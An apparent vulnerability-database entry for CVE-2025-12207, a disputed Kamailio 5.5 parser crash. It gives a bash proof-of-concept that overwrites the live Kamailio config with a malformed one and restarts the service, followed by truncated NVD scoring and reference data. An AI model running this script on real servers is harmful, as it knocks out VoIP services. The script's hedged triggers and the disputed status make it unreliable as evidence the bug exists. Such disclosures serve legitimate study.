CVE-2025-12207

#!/bin/bash # CVE-2025-12207 PoC - Kamailio 5.5 yyerror_at Null Pointer Dereference # This PoC demonstrates triggering the vulnerability via malformed config # Create a malicious Kamailio configuration file cat > /tmp/malicious.cfg << 'EOF' # Kamailio Configuration File - Malformed for CVE-2025-12207 # Load required modules loadmodule "sl.so" loadmodule "tm.so" loadmodule "rr.so" loadmodule "maxfwd.so" loadmodule "usrloc.so" loadmodule "registrar.so" loadmodule "textops.so" loadmodule "textopsx.so" loadmodule "xlog.so" # Module parameters modparam("usrloc", "db_mode", 0) # Route block with syntax that triggers yyerror_at route { # Intentionally malformed request URI # This should trigger the null pointer dereference in yyerror_at if (($ru == "") || ($ru.method == "INVITE")) { # Force parsing error by using invalid transformation $var(test) = $(ru{invalid_transform); sl_send_reply("404", "Not Found"); exit; } # Another potential trigger point if (method=="REGISTER") { # Malformed condition that may trigger parser error if ($avp(s:invalid) == ) { save("location"); } exit; } } # Error route for handling parsing errors error_route { sl_send_reply("500", "Server Internal Error"); } EOF # Backup original config if exists if [ -f /etc/kamailio/kamailio.cfg ]; then cp /etc/kamailio/kamailio.cfg /etc/kamailio/kamailio.cfg.bak fi # Replace config and restart Kamailio cp /tmp/malicious.cfg /etc/kamailio/kamailio.cfg systemctl restart kamailio # Check for crash or error in logs grep -i "null pointer" /var/log/kamailio.log || echo "Check logs manually"

{"cve": {"id": "CVE-2025-12207", "sourceIdentifier": "[email protected]", "published": "2025-10-27T03:15:49.937", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Kamailio 5.5. This affects the function yyerror_at of the file src/core/cfg.y of the component Grammar Rule Handler. Such manipulation leads to null pointer dereference. The attack needs to be performed locally. The exploit has been disclosed to the public and may be used. The actual existence of this vulnerability is currently in question. This attack requires manipulating config files which might not be a realistic scenario in many cases. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kamailio:kamailio:5.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "5F943D79-8040-4E2D-AEBB-CACF52099921"}]}]}], "references": [{"url": "https://shimo.im/docs/vVqRMVMlrycMO63y/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329877", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329877", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673241", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.openwall.com/lists/oss-security/2025/11/02/3", "source": "[email protected]"}, {"url": "http://www.openwall.com/li ... (truncated)